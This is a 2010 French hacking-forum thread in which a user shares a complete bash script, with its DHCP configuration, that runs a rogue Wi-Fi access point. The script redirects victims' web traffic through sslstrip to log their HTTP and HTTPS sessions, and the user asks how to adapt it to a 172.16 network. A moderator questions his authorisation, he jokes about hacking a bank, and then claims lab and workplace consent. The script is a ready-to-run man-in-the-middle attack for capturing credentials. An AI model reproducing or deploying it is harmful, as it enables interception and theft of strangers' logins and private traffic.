Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-09-2010 20:05:23

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Réseau étendu, 172.16 et Rogue AP

Bonjour à tous et à toutes,

Ayant à peu près compris l'attaque par Rogue AP, je me suis créé un petit script perso qui me permet d'automatiser la chose.

Cependant, pour le moment ma Rogue AP n'avait visé que des réseaux simples, de boxes perso, à savoir des architectures d'adresse simples, en 192.168.X.X.

Or, je m'intéresse au problème de la portabilité éventuelle d'une telle attaque sur un réseau plus étendu, avec une architecture IP en 172.16.X.X.

Le réseau WIFI auquel je me connecte, que j'ai monté, est bâtit de la sorte :

* IP atreibuée par le DHCP : 172.16.82.86
* Sous-réseau : 255.255.240.0
* Routeur : 172.16.95.253

Voici mon script :


#!/bin/bash
name="Rogue Creator"
version=0.1
by=Carto

#DEBUG=ON
DEBUG=OFF


killall -9 dhcpd tcpdump airbase-ng dhcpd3

echo 1 > /proc/sys/net/ipv4/ip_forward;
cat /proc/sys/net/ipv4/ip_forward;
echo
echo

echo ">>> Interface Internet ? ";
read IFACE;
echo

echo ">>> Interface Rogue ? ";
read WIFACE
echo

airmon-ng start $WIFACE;
modprobe tun;
echo
echo
echo ">>> Nom de la Rogue_AP ? "
read NAME_AP
echo
echo
echo ">>> Channel de la Rogue_AP ?"
read CHANNEL

xterm -hold -e airbase-ng -P -C 30 -c $CHANNEL -e $NAME_AP -v mon0 &>/dev/null &
sleep 2

echo ">>> SCRIPT EN COURS D'ÉXÉCUTION <<<"
modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;


mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
xterm -hold -e dhcpd3 -d -f -cf /root/Rogue/conf/dhcpd/dhcpd_marine.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &

sleep 2

iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000;
echo
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222;
iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.1.129:10000
iptables -t nat -A PREROUTING -i $IFACE -p tcp -m tcp -m multiport --dports 80,443 -j REDIRECT --to-ports 10000
echo -e ""$RED"Starting sslstrip"$END""
# sslstrip: Log all SSL and HTTP traffic to and from server, substitute a lock favicon, kill sessions in progress.
echo -e "$GREEN"
xterm -e "sslstrip -a -f -k --write /root/logs/output-ssl.log"&
echo -e "$END"

Et le DHCPD.CONF

 ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 208.67.222.222;
range 192.168.1.130 192.168.1.140;
}

Même si je ne dispose pas de toutes les bases de connaissance nécessaire au portage d'un tel script sur un réseau dit "étendu", je suppose néanmoins qu'il va falloir que je modifie ces parties du script :

modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;

Mais aussi :

iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.1.129:10000

Et, bien entendu, arrêtez moi si je me trompe, le DHCP (à moins que je puisse, connecté sur un réseau 172.16.X.X via eth0 restransmettre internet via ma Rogue AP attribuant un IP en 192.168.X.X à mes clients, ce dont je doute.

Merci de vos lumières éventuelles smile

Carto_

Dernière modification par Carto_ (28-09-2010 20:08:49)


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-09-2010 20:11:00

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Réseau étendu, 172.16 et Rogue AP

Merci c cool mais je reste sur atxwpa et bt3 pour ce genre de choses mais c bien de partager ton taff

Hors Ligne

#3 29-09-2010 02:48:29

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Réseau étendu, 172.16 et Rogue AP

Oui ce sont des attaques qui fonctionnent toujours aussi bien mais malheureusement BT3 commence à devenir vieillot :-)
C'est un plaisir de pouvoir partager quelles brides de script stupide après tant d'années à prendre sans pouvoir donner en retour !

Personne n'a une petite idée pour mon problème d'architecture du script pour un réseau étendu en 172.16.X.X ?!


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#4 29-09-2010 15:58:12

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Réseau étendu, 172.16 et Rogue AP

Carto_ a écrit :

Personne n'a une petite idée pour mon problème d'architecture du script pour un réseau étendu en 172.16.X.X ?!

Du calme, laisse-nous le temps d'arriver, m*rde quoi ! tongue
Vu tout le code que tu proposes (et que tu demandes d'adapter), il nous faut un peu de temps pour "digérer" ton post avant de te répondre wink

Bon, première remarque : les réseaux de type 172.16.*.*, bien que privés (plage réservée aux LAN, tout comme 192.168.*.*), sont assez rares dans les réseaux de particuliers hmm Donc triple question :
- c'est quoi comme réseau ?
- si c'est le tien, pourquoi choisir cette plage précise ?
- si ce n'est pas le tien, as-tu l'autorisation du propriétaire de faire des tests dessus ?

Ceci étant dit, l'adaptation que tu demandes devrait être assez rapide, vu que tu restes sur un LAN avec une plage privée. Normalement, il n'y a quasiment rien à adapter, les 2 sous-réseaux en jeu (celui du réseau-cible et celui de ton Rogue AP) ne sont pas liés. Ca veut donc dire que même si le DHCP "officiel" t'attribue l'IP 172.16.82.86, tu peux attribuer ce que tu veux aux "clients" de ton Rogue ; le vrai réseau n'en saura rien, il n'a pas besoin de le savoir et il s'en fout. Toute la partie transfert est assurée par iptables/ip_forward et une bonne table de routage smile

Est-ce que tu as essayé ton script tel quel sur le réseau en question, et si oui où est-ce que ca coince (avec ton expérience maintenant tu devrais être en mesure de donner une réponse précise big_smile).
Et j'aimerais bien les précisions sur le réseau concerné, aussi wink

Hors Ligne

#5 29-09-2010 19:39:41

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Réseau étendu, 172.16 et Rogue AP

     Aaaaaah antares145, je me disais bien que j'aurais le droit à quelques questions suite à un post aussi ciblé sur l'architecture du réseau attaqué !

     Bé tsé, à coté ché moé i y a 1 banK et jé vé la haKé & son réso é en 172.16. alor fo ké zé puiss le haké sino zé plu d'arjen car zé tou perdu o pokér hiér souér !

     Trêve de bavasserie, la raison est toute simple:

J'ai deux environnements de tests pour vérifier que mes attaques sont bien fonctionnelles :

- Mon environnement de test personnel composé de mes 5 PC sur un LAN en IP classe C. Cependant, dans la mesure ou je contrôle tout sur cet environnement, serveurs et différents devices, je ne suis pas à l'abris d'une erreur qui va se présenter "en live", hors de chez moi.

- Un environnement de test dans ma boite, ou je peux m'amuser à effectuer tous mes tests avec l'accord du DI (Directeur Informatique) que ça fait bien rire et qui s'y intéresse de plus en plus. Dans la mesure ou nous avons un nombre hallucinant de PC, la Classe C ne suffit plus à répondre à nos attentes, d'ou les adresses type classe B.

Soulagé ? smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#6 29-09-2010 21:43:17

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Réseau étendu, 172.16 et Rogue AP

Carto_ a écrit :

  Bé tsé, à coté ché moé i y a 1 banK et jé vé la haKé & son réso é en 172.16. alor fo ké zé puiss le haké sino zé plu d'arjen car zé tou perdu o pokér hiér souér !

Hahaaa, je le savais ! Allez, hop, kick & ban on ne veut pas de sangsue sur le forum, tchao ! lol

Bon trêve de bavasserie comme tu le dis, en tant que modo je suis un peu "obligé" de poser ce genre de question dès que les intentions deviennent floues. Ca ne m'amuse pas spécialement de jouer au gendarme comme ca, mais ca fait partie du jeu donc j'applique. Mais personnellement ca ne me pose pas d'énorme problème moral, la preuve c'est que j'ai quand même répondu à ta question smile "Soulagé" n'est pas vraiment le mot, mais j'aime mieux discuter sur des bases saines, c'est sûr, et désolé si tu t'es senti vexé/offensé wink

Je pense que ma réponse précédente tient toujours : fais un essai avec ton script original, et regarde si ca marche. En théorie ca ,ne devrait pas poser de problème (à cause de cette stricte séparation entre le réseau-cible et le sous-réseau de ton Rogue) smile Si jamais ca coince, tu as assez souffert sur cette config pour diagnostiquer le problème, ou au moins nous dire où chercher le problème tongue

Hors Ligne

#7 29-09-2010 23:31:47

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Réseau étendu, 172.16 et Rogue AP

T'en fais pas, je ne suis pas vexé pour un sous et je comprends tout à fait tes questions et recommandations; elles sont fondées et on tout à fait lieu d'être dans un forum tel que celui-ci si on ne veut pas que tout part à vaux l'eau !

J'essaye dès demain au bouleau, et je te dis ce qu'il en ressort. De ce que j'ai compris, il ne devrait pas y avoir d'interférences entre le réseau sur lequel je me connecte et celui que j'attribue à ma victime via la Rogue AP donc tu as raison, j'aurais du tenter avant de poster comme un néophyte smile

Merci en tous cas de toute l'aide que tu m'apporte, un jour peut être serais-je à même d'éclairer certains par mes lumières, même si c'est loin d'être le cas pour le moment !

Carto_


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#8 20-11-2010 04:17:43

Syfer
Membre Indispensable
Inscription : 09-06-2010
Messages : 507
Site Web

Re : Réseau étendu, 172.16 et Rogue AP

Carto_ a écrit :

Bé tsé, à coté ché moé i y a 1 banK et jé vé la haKé & son réso é en 172.16. alor fo ké zé puiss le haké sino zé plu d'arjen car zé tou perdu o pokér hiér souér !

Hey Carto_ vient tu du Québéc toé si tongue c'est juste que sa ressemble vraiment au parlé Québécois vos cousins hehe big_smile


masignature.gif

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2081 28-11-2016 19:42:10 par koala
35 1697 23-11-2016 16:31:33 par roofnat
16 1030 17-11-2016 12:22:00 par disquette
10 412 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 441 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]